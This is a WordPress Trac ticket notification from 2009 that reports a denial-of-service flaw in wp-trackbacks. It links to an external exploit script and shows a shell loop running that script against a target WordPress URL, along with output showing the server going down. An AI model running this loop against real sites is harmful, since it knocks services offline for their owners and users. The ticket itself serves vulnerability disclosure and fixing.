[wp-trac] [WordPress Trac] #10980: DoS in wp-trackbacks

WordPress Trac wp-trac at lists.automattic.com
Mon Oct 19 19:25:17 UTC 2009


#10980: DoS in wp-trackbacks
-----------------------------+----------------------------------------------
 Reporter:  gomex            |       Owner:            
     Type:  defect (bug)     |      Status:  new       
 Priority:  highest omg bbq  |   Milestone:  Unassigned
Component:  General          |     Version:            
 Severity:  major            |    Keywords:            
-----------------------------+----------------------------------------------
 The exploit: http://codes.zerial.org/php/wp-trackbacks_dos.phps

 Execution:

 $ while /bin/true; do php test.php http://target.bom/wordpress; done
 hit!
 hit!
 hit!
 hit!
 hit!
 hit!
 hit!
 hit!
 hit!
 hit!

 Notice: fputs(): send of 8192 bytes failed with errno=11 Resource
 temporarily unavailable

 down!!

 Load average: 22.07, 15.18, 8.58 (on target server)

-- 
Ticket URL: <http://core.trac.wordpress.org/ticket/10980>
WordPress Trac <http://core.trac.wordpress.org/>
WordPress blogging software


More information about the wp-trac mailing list